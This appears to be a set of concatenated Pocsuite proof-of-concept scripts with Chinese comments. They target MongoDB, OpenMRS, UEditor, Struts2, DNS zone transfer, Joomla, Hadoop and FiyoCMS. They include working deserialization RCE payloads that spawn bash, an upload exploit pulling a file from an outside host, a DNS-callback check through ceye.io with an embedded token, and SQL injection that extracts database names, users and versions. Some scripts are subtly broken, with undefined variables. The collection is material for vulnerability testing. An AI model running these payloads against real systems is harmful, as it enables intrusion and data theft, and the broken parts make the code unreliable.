#!/usr/bin/python
# -*- coding: utf-8 -*-


import pymongo
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register




class TestPOC(POCBase):
    name = 'MongoDB未授权访问'
    vulID = '78176'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['zeal']
    vulType = 'unauth'
    version = '1.0'    # default version: 1.0
    references = ['http://www.s3cur1ty.de/m1adv2013-003']
    desc = '''未授权'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'MongoDB未授权'
    appVersion = '无'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        try:
            port = 27017
            connection = pymongo.MongoClient(self.target,port,socketTimeoutMS=3000)
            dbs = connection.database_names()
        except Exception as e:
            result = {}
        

        if dbs:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = '%s:%i存在MongoDB未授权' %(self.target,port)

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('失败')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register


def poc(url):
    proxy = {
    }
    ressource = "/openmrs/ws/rest/v1/concept"
    burp0_url = url + ressource
    burp0_headers = {"Content-Type": "application/xml"}
    try:
        r = req.post(burp0_url, headers=burp0_headers, proxies=proxy,
                     verify=False, allow_redirects=False)
        if r.status_code == 500:
            while True:
                try:
                    burp0_url = url + ressource
                    burp0_headers = {"Content-Type": "text/xml"}
                    burp0_data = "<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString>\r\n      <flags>0</flags>\r\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n        <dataHandler>\r\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n            <is class=\"javax.crypto.CipherInputStream\">\r\n              <cipher class=\"javax.crypto.NullCipher\">\r\n                <initialized>false</initialized>\r\n                <opmode>0</opmode>\r\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\r\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n                    <next class=\"java.lang.ProcessBuilder\">\r\n                      <command>\r\n                        <string>/bin/bash</string>\r\n                        <string>-c</string>\r\n  \t\t\t<string>{echo," + command_str + \
                                 "}|{base64,-d}|{bash,-i}</string>\r\n                      </command>\r\n                      <redirectErrorStream>false</redirectErrorStream>\r\n                    </next>\r\n                  </iter>\r\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n                    <method>\r\n                      <class>java.lang.ProcessBuilder</class>\r\n                      <name>start</name>\r\n                      <parameter-types/>\r\n                    </method>\r\n                    <name>foo</name>\r\n                  </filter>\r\n                  <next class=\"string\">foo</next>\r\n                </serviceIterator>\r\n                <lock/>\r\n              </cipher>\r\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n              <ibuffer></ibuffer>\r\n              <done>false</done>\r\n              <ostart>0</ostart>\r\n              <ofinish>0</ofinish>\r\n              <closed>false</closed>\r\n            </is>\r\n            <consumed>false</consumed>\r\n          </dataSource>\r\n          <transferFlavors/>\r\n        </dataHandler>\r\n        <dataLen>0</dataLen>\r\n      </value>\r\n    </jdk.nashorn.internal.objects.NativeString>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n  </entry>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n  </entry>\r\n</map>"
                    r = req.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy,
                                 verify=False, allow_redirects=False)
                    if r.status_code == 500:
                        m = re.search(
                            '(java.util.HashMap)', r.text)
                        if m:
                            return True
                        else:
                            return False
                    else:
                        break
                except KeyboardInterrupt:
                    break
        else:
            return False
    except:
        return False


class TestPOC(POCBase):
    name = 'OpenMRS 反序列漏洞'
    vulID = 'CVE-2018-19276'  # https://www.seebug.org/vuldb/ssvid-97826
    author = ['sxd']
    vulType = 'RCE'  # 远程代码执行漏洞
    version = '1.0'  # default version: 1.0
    references = ['']
    desc = '''
		   OpenMRS[1]是一种基于患者的医疗记录系统，专注于为提供商提供免费的可定制电子病历系统（EMR）。2017 年，OpenMRS 在 3,000 多个站点上实施，并为超过 870 万活跃患者存储信息。

2019 年2 月4 日，安全研究员Nicolas Serra 在Bishop Fox 博客上披露了OpenMRS在版本小于 2.24.0 中存在反序列命令执行漏洞。
		   '''
    vulDate = '2020-04-02'
    createDate = '2020-04-02'
    updateDate = '2020-04-02'
    appName = 'openMRS'
    appVersion = '1.10.X; 1.11.8; 1.11.9; 1.12.X; 2.0.x; 2.1.x '
    appPowerLink = ''  # 漏洞厂商主页地址
    samples = ['']  # 测试用例
    install_requires = ["re"]

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo'][
                'URL'] = self.url + 'OpenMRS Platform Insecure Object Deserialization_CVE-2018-19276' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class ueditorPOC(POCBase):
    vulID = '51'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-08-23' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2018-08-23'# 编写 PoC 的日期
    updateDate = '2018-08-23'# PoC 更新的时间,默认和编写时间一样
    references = ['']# 漏洞地址来源,0day不用写
    name = 'Ueditor .net upload'# PoC 名称
    appPowerLink = ''# 漏洞厂商主页地址
    appName = 'Ueditor'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'File Upload'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Ueditor .net任意文件上传导致getshell
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 1-redis.py -u 1.1.1.1 --verify

    ##########################################
    #                                        #
    #     更改shell_addr为自己的服务器资源      #
    #                                        #
    ##########################################

    def _verify(self):
        from urlparse import urlparse
        import json
        #定义返回结果
        result = {}
        #获取漏洞url
        url = '%s' % self.url
        proxies = {
            # 'http':'http://127.0.0.1:8080',
            # 'https':'http://127.0.0.1:8080',
        }

        #如果设置端口则取端口,没有设置则为默认端口
        try:
            # http://file.0535code.com/ue_poc.jpg
            shell_ip = 'file.0535code.com'
            shell_file = 'ue_poc.jpg'
            shell_addr = urlparse(url).scheme + '://' + shell_ip + '/' + shell_file + '?.txt'
            vul_ip = urlparse(url).netloc
            vul_url = urlparse(url).scheme + '://' + vul_ip + '/ueditor/net/controller.ashx?action=catchimage'
            test_url = urlparse(url).scheme + '://' + vul_ip + '/ueditor'
            res = req.get(test_url, timeout=5, verify=False,)
            if res.status_code == 200:
                params = {"source[]": (None, shell_addr),}
                res = req.post(vul_url, files=params, timeout=5, verify=False, proxies=proxies,)
                if res.text:
                    res_data = json.loads(res.text)
                    if res_data['state'] == 'SUCCESS':
                        upload_addr = res_data['list'][0]['url']
                        upload_url = urlparse(url).scheme + '://' + vul_ip + '/ueditor/net/' + upload_addr
                        res = req.get(upload_url, timeout=5, verify=False, proxies=proxies,)
                        if res.status_code == 200 and 'vulnerable' in res.text:
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['URL'] = upload_url
                            result['VerifyInfo']['Payload'] = vul_url

        except Exception as e:
            # return host
            print(str(e))
       
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(ueditorPOC)




#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class Struts2(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2018-08-24'
    createDate = '2020-07-01'
    updateDate = '2020-07-01'
    references = ['']
    name = 'Apache Struts2 远程代码执行漏洞 (S2-052/CVE-2017-9805)'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Struts2'
    appVersion = 'Struts2.5 – Struts2.5.12'
    vulType = 'rce'
    desc = '''
    Apache Struts2 远程代码执行漏洞 (S2-052/CVE-2017-9805)
    '''

    def _verify(self):
        result = {}
        try:
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            payload = '<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> %s' % cmd2
            payload += ' </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>'
            r = requests.post(self.url, data=payload, headers=self._headers)
            if r.status_code == 200 :
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Content-Type': 'application/xml'
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Struts2)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req  # 用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import socket
from dns import resolver, query, exception


class DNS_transforPoc(POCBase):
    vulID = "0"
    version = "1"
    author = "akame"
    vulDate = "2017-8-12"
    createDate = "2017-8-12"
    updateDate = "2017-8-12"
    # 漏洞地址来源,0day不用写
    references = ['http://www.lijiejie.com/dns-zone-transfer-3/']
    name = 'Dns Transfor  DNS域传送 PoC'  # PoC 名称
    appPowerLink = 'None'  # 漏洞厂商主页地址
    appName = 'dns'  # 漏洞应用名称
    appVersion = '*.x'  # 漏洞影响版本
    vulType = 'Information Disclosure'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        若DNS服务器配置不当，可能导致匿名用户获取某个域的所有记录。
        造成整个网络的拓扑结构泄露给潜在的攻击者，包括一些安全性较低的内部主机，如测试服务器。
        凭借这份网络蓝图，攻击者可以节省很少的扫描时间。
       大的互联网厂商通常将内部网络与外部互联网隔离开，
       一个重要的手段是使用Private DNS。如果内部DNS泄露，将造成极大的安全风险。风险控制不当甚至造成整个内部网络沦陷。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    install_requires = ['socket']

    def _attack(self):
        vul_url = self.url
        result = {}
        nss = resolver.query(vul_url, 'NS')
        nameservers = [str(ns) for ns in nss]
        for ns in self.nameservers:
            z = self.query(ns)
            if z != None:
                result['domain'] = vul_url
                result['ns'] = ns
        return self.parse_attack(result)

    def _verify(self, verify=True):
        vul_url = self.url
        result = {}
        nss = resolver.query(vul_url, 'NS')
        nameservers = [str(ns) for ns in nss]
        for ns in self.nameservers:
            z = self.query(ns)
            if z != None:
                result['domain'] = vul_url
                result['ns'] = ns
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

    def query(self, ns):
        nsaddr = self.resolve_a(ns)
        try:
            z = self.pull_zone(nsaddr)
        except (exception.FormError, socket.error, EOFError):
            return None
        else:
            return z

    def resolve_a(self, name):
        """Pulls down an A record for a name"""
        nsres = resolver.query(name, 'A')
        return str(nsres[0])

    def pull_zone(self, nameserver):
        """Sends the domain transfer request"""
        q = query.xfr(nameserver, self.domain, relativize=False, timeout=2)
        zone = ""
        for m in q:
            zone += str(m)
        if not zone:
            raise EOFError
        return zone


register(DNS_transforPoc)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '86873'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-04-13'
    createDate = '2016-01-27'
    updateDate = '2016-01-27'
    references = ['http://www.seebug.org/vuldb/ssvid-86873']
    name = 'HD FLV Player Component for Joomla! &#39;id&#39; Parameter SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'HD FLV Player Component for Joomla!'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla!是一款开放源码的内容管理系统(CMS)。
        Joomla!的组件HD FLV Player (com_hdflvplayer)存在SQL注入漏洞。
        远程攻击者可以利用脚本index.php的id执行任意的SQL指令。
    '''
    samples = ['http://zeweldfc.com']

    def _attack(self):
        #利用floor回显报错的方式，读取数据库信息
        result = {}
        payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
            "(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"
            "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- -")
        exploit="/index.php?option=com_hdflvplayer&id="
        #提取信息的正则表达式
        pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查
        if 'Duplicate entry' in resp.content:
            #尝试提取信息
            match=re.search(pars,resp.content,re.I|re.M)
            if match:
                #记录数据库信息
                result['DatabaseInfo']={}
                #数据库用户名
                result['DatabaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞计算md5(3.1415)
        result = {}
        #利用的payload(利用的是floor回显报错的方式)
        payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
            "(md5(3.1415),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA"
            ".CHARACTER_SETS GROUP BY x)a) -- -")
        #漏洞页面
        exploit='/index.php?option=com_hdflvplayer&id='
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip


# 基础基类
class HadoopPOC(POCBase):
    vulID = '28'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-05-11'  # 漏洞公开的时间,不知道就写今天
    author = 'mel0dyzx'  # PoC作者的大名
    createDate = '2018-05-11'  # 编写 PoC 的日期
    updateDate = '2018-05-11'  # PoC 更新的时间,默认和编写时间一样
    references = 'http://www.52bug.cn/黑客技术/3905.html'  # 漏洞地址来源,0day不用写
    name = 'Hadoop Unauthorized Access'  # PoC 名称
    appPowerLink = 'hadoop.apache.org'  # 漏洞厂商主页地址
    appName = 'Hadoop'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'Information Disclosure'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Hadoop 未授权访问漏洞
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # 调用指纹方法
        result={}
        output = Output(self)
        scan_ports = {
                "50070", #dfs.namenode.http-address
                "50470", #dfs.namenode.https-address
                "50105", #dfs.namenode.backup.http-address
                "50090", #dfs.namenode.secondary.http-address
                "50091", #dfs.namenode.secondary.https-address
                "50075", #dfs.datanode.http.address
                "50475", #dfs.datanode.https.address
                "8480",  #dfs.journalnode.http-address
                "8088",  #yarn.resourcemanager.webapp.address
                "8090",  #yarn.resourcemanager.webapp.https.address
                "8042",  #yarn.nodemanager.webapp.address
                "8188",  #yarn.timeline-service.webapp.address
                "19888", #mapreduce.jobhistory.webapp.address
                "60010", #hbase.master.info.port, HMaster的http端口
                 "60030",#hbase.regionserver.info.port HRegionServer的http端口
                }
        vul_port = []
        for i in scan_ports:
            #print i
            vul_url = '%s:%s' % (self.url,i)
            try:
                response = req.get(str(vul_url), timeout=1).text
                #print response
                if "hbase" in response.lower() or\
                    "url=/rs-status" in response.lower() or\
                    "hadoop" in response.lower():
                    vul_port.append(i)
            except:
                #print e
                pass
        if vul_port.__len__() > 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
            result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
        print('[+]28 poc done')
        return self.save_output(result)
        #pass

    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(HadoopPOC)





#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def get_url(url, refer):
    try:
        httpreq = req.Session()
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "refer"
        }
        resp = httpreq.get(url, headers=headers)
    except Exception as ex:
        resp = None
    return resp

def getLength(self,payload1):
    for i in range(1,100):
        payload='?stat=0&id=3 or if(length(database())=' + str(i) + ',sleep(3),1)#'
        refer = self.url
        starttime=time.time()
        resp = get_url(self.url + payload1 + payload,refer)
        endtime=time.time()
        b=endtime-starttime
        if b>3:
            data = getData(i,self,payload1)
            break
    return data

def getData(i,self,payload1):
    payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.}{!&*'
    user=''
    for x in range(i):
        for pay in payloads:
            payload='?stat=0&id=3 or if(mid(database(),'+ str(x+1) + ',1) like ' + "'" + pay + "%" +"'" + ',sleep(3),1)#'
            print(payload)   
            refer = self.url
            starttime=time.time()
            resp = get_url(self.url + payload1 + payload,refer)
            endtime=time.time()
            b=endtime-starttime
            if b>3:
                user+=pay
                # break
    return user




class TestPOC(POCBase):
    name = 'fiyocms SQL Injection Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = ['http://p0desta.com/2018/10/15/fiyocms代码审计']
    desc = '''fiyocms dapur/apps/app_comment/controller/comment_status.php 存在时间盲注'''

    vulDate = '2018-10-15'
    createDate = '2019-04-13'
    updateDate = '2019-04-13'

    appName = 'fiyocms'
    appVersion = '2.0 1.8'
    appPowerLink = 'https://github.com/FiyoCMS/FiyoCMS'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/dapur/apps/app_comment/controller/comment_status.php'
        dbname1 = getLength(self,payload1)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1
        return self.parse_output(result)
        
    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = '/dapur/apps/app_comment/controller/comment_status.php'
        payload = '?stat=0&id=3 or if(1,sleep(5),1)#'
        refer = self.url

        starttime=time.time()
        resp = get_url(self.url + payload1 + payload,refer)
        endtime=time.time()
        b=endtime-starttime
        if b>5:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

